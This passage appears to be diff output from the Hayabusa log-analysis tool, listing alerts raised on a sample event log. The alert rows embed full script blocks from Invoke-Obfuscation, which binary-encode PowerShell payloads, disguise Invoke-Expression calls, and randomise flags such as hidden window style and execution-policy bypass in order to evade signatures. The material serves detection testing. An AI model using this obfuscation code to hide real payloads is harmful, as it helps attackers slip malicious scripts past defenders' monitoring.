{$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBinaryCommand { <# .SYNOPSIS Generates binary encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBinaryCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBinaryCommand encodes an input PowerShell scriptblock or path as a binary payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIn -NoProf ""-Join ('1010111y1110010W1101001{1110100G1100101y101101;1001000T1101111@1110011G1110100y100000@100111y1001000@1100101d1101100<1101100b1101111d100000W1010111@1101111G1110010{1101100@1100100@100001<100111G100000y101101;1000110;1101111y1110010G1100101d1100111y1110010G1101111@1110101W1101110b1100100G1000011;1101111d1101100{1101111y1110010d100000<1000111<1110010T1100101W1100101@1101110d111011{100000T1010111{1110010{1101001{1110100y1100101b101101<1001000y1101111{1110011W1110100d100000d100111b1001111<1100010b1100110<1110101d1110011W1100011W1100001T1110100T1101001{1101111;1101110W100000T1010010b1101111<1100011W1101011;1110011;100001d100111@100000y101101<1000110T1101111G1110010{1100101W1100111{1110010G1101111d1110101W1101110@1100100@1000011{1101111d1101100y1101111T1110010{100000{1000111{1110010T1100101b1100101;1101110'-SplIt'b'-SpLit '@'-SPLIt '{' -SpLIT'<'-SPLIT'd' -SpLIT 'T'-SplIt ';' -SpLiT 'G' -SPLiT'y'-SpLiT'W' | ForEach-Object { ([Char]([Convert]::ToInt16(( $_.ToString() ) ,2) ))} )| IEX"" C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX( -Join ('1010111<1110010>1101001a1110100>1100101r101101{1001000@1101111l1110011l1110100a100000<100111m1001000r1100101{1101100{1101100{1101111>100000{1010111>1101111>1110010m1101100O1100100a100001O100111&100000@101101&1000110<1101111a1110010&1100101&1100111O1110010r1101111r1110101<1101110O1100100m1000011{1101111>1101100m1101111{1110010m100000{1000111a1110010>1100101>1100101m1101110&111011O100000r1010111&1110010l1101001{1110100{1100101r101101@1001000&1101111>1110011<1110100&100000>100111a1001111{1100010a1100110@1110101{1110011&1100011r1100001@1110100l1101001>1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001<100111a100000{101101@1000110a1101111{1110010m1100101a1100111>1110010l1101111m1110101l1101110@1100100r1000011&1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@1100101@1101110'.Split( 'l@>{r<mOa&') | ForEach-Object{ ( [Convert]::ToInt16(( [String]$_ ) , 2 ) -As[Char]) } )) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 2 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Binary values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and rando",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
